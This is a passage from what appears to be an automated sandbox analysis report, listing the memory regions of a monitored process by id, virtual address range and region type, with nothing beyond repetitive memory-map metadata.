filename = "" Region: id = 11715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11732 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11736 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11737 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11738 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11739 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11740 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11741 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11744 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11745 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11766 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11767 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11771 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11772 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11773 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11774 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11775 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11776 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11777 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11778 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11779 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11780 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11781 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11782 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11783 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11784 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11785 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11786 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11787 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11788 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11789 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11790 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11791 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11792 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11793 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11794 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11795 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11796 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11797 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11798 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11799 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11800 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11801 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11802 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11803 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11804 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11805 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11806 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11807 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11808 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11809 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11810 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11811 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11812 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11830 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11831 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11850 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11851 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11859 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11860 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11864 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 11865 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 11866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11867 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11868 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11869 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11870 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11871 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11872 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11873 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11874 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11875 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11876 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11877 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11878 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11879 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11881 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11882 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11883 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 11884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 11900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" 